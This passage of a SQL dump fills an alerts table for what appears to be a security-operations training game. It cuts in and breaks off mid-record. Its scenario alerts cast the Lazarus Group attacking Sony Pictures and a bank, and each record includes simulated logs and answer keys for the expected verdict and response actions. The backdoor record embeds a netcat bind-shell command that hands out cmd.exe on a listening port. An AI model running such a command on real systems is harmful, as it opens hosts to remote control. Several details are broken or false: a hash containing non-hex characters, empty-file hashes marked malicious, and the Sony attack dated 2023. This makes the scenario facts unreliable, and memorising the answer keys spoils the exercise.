3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1460, 'Exfiltration of Stolen Funds', 'critical', 'Financial Transaction Monitoring', 'Alert triggered during the exfiltration phase of a cyber heist involving the transfer of laundered funds to offshore accounts. The operation is suspected to be conducted by the Lazarus Group using sophisticated financial manipulation techniques.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T15:45:32Z\",\"transaction_id\":\"TX123456789\",\"source_ip\":\"192.168.10.45\",\"destination_ip\":\"203.0.113.15\",\"amount\":\"5,000,000 USD\",\"currency\":\"USD\",\"destination_account\":\"Offshore-Account-987654321\",\"source_account\":\"Compromised-Account-123456789\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"funds_transfer.exe\",\"username\":\"jdoe\",\"comments\":\"Funds moved to offshore account using compromised credentials.\"}', '2026-03-07 00:50:56', '2026-03-09 05:46:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in transaction.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP associated with known offshore financial activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malware used in financial theft operations.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"funds_transfer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable used in unauthorized fund transfers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"Account compromised; used in unauthorized transactions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised credentials.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1461, 'Initial Access: Spear Phishing Campaign', 'high', 'Email logs', 'The attackers initiated their operation by launching a tailored spear phishing campaign aimed at Sony employees, leveraging social engineering tactics to deliver malicious payloads. A suspicious email with a malicious attachment was detected, originating from a known malicious public IP address.', 'Phishing', 'T1566.001', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-12T14:35:21Z\",\"source_ip\":\"185.123.231.45\",\"destination_email\":\"j.smith@sonypictures.com\",\"subject\":\"Urgent: Update Required\",\"attachment\":{\"name\":\"Update_Required.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"internal_ip\":\"192.168.1.25\"}', '2026-03-07 00:51:05', '2026-03-11 17:51:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.231.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"j.smith@sonypictures.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Valid Sony Pictures employee email\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted host\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Spear Phishing Campaign\",\"date\":\"2026-03-07T14:15:20.852Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1462, 'Execution: Deployment of Destructive Malware', 'critical', 'Endpoint security logs', 'Upon gaining access, the attackers deployed a custom-built malware designed to destroy data and disrupt Sony Pictures\' operations, demonstrating the group\'s capability for destructive cyber attacks.', 'Malware', 'T1485: Data Destruction', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.15\",\"username\":\"j.doe\",\"process_name\":\"wiper.exe\",\"file_hash\":\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\",\"filename\":\"destructive_payload.dll\",\"action\":\"Executed\",\"status\":\"Success\"}', '2026-03-07 00:51:05', '2026-03-11 03:21:50', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group IP used in previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with destructive malware used by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"destructive_payload.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"File used in execution of destructive payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1463, 'Persistence: Establishing Backdoor Access', 'critical', 'Network traffic analysis', 'To ensure continued access, the attackers installed backdoors across the network, allowing them to remotely control and monitor compromised systems without detection.', 'Backdoor', 'T1105: Ingress Tool Transfer', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T06:34:22Z\",\"src_ip\":\"193.168.1.100\",\"dst_ip\":\"10.0.0.25\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":12345,\"filename\":\"nc.exe\",\"file_hash\":\"b6a9b3f8a8e4b5c8f9c2d7e58f8a3b6c\",\"username\":\"j.doe\",\"action\":\"file_transfer\",\"threat_actor\":\"Lazarus Group\",\"malware_name\":\"Backdoor:Win32/CustomLazarus\",\"external_command\":\"RUN nc.exe -lvp 12345 -e cmd.exe\"}', '2026-03-07 00:51:05', '2026-03-11 03:23:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"193.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"ip-reputation-database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal-network\",\"verdict\":\"internal\",\"details\":\"Internal server identified as targeted host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware-analysis\",\"verdict\":\"malicious\",\"details\":\"File used for unauthorized access and control.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b6a9b3f8a8e4b5c8f9c2d7e58f8a3b6c\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash-reputation-database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor tools used by the Lazarus Group.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal-user-database\",\"verdict\":\"suspicious\",\"details\":\"User account activity inconsistent with usual behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1464, 'Lateral Movement: Expanding Reach within the Network', 'high', 'Network flow logs', 'The attackers used stolen credentials and network vulnerabilities to move laterally within Sony\'s infrastructure, searching for sensitive information and furthering their infiltration.', 'Network Propagation', 'T1563.002', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_type\":\"network_traffic\",\"source_ip\":\"10.0.45.23\",\"destination_ip\":\"192.168.1.105\",\"external_attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"action\":\"login_attempt\",\"username\":\"j.doe\",\"status\":\"success\",\"hash\":\"f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\",\"filename\":\"malware_payload.dll\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"ip\",\"value\":\"192.168.1.105\"},{\"type\":\"ip\",\"value\":\"10.0.45.23\"},{\"type\":\"hash\",\"value\":\"f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\"},{\"type\":\"filename\",\"value\":\"malware_payload.dll\"},{\"type\":\"username\",\"value\":\"j.doe\"}]}', '2026-03-07 00:51:05', '2026-03-11 03:43:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel Database\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group infrastructure IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.45.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Employee workstation\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Recognized Lazarus malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malware_payload.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as malicious payload\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1465, 'Exfiltration: Data Theft and Leakage', 'critical', 'Data transfer logs', 'Concluding their operation, the attackers exfiltrated a vast amount of confidential data, later leaking it publicly to cause reputational damage and disrupt Sony Pictures\' business operations.', 'Data Exfiltration', 'T1041', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T03:30:12Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"45.76.23.17\",\"user\":\"jdoe\",\"files_exfiltrated\":[\"confidential_report_2023.pdf\",\"financial_summary.xlsx\"],\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"protocol\":\"HTTPS\",\"destination_port\":443,\"malware_associated\":\"Sony Pictures\",\"comment\":\"Data exfiltrated to external IP, associated with known APT operations.\"}', '2026-03-07 00:51:05', '2026-03-11 03:44:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.23.17\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Lazarus Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with tools used in prior APT operations.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_documentation\",\"verdict\":\"sensitive\",\"details\":\"Sensitive company document.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"company_directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account used for exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 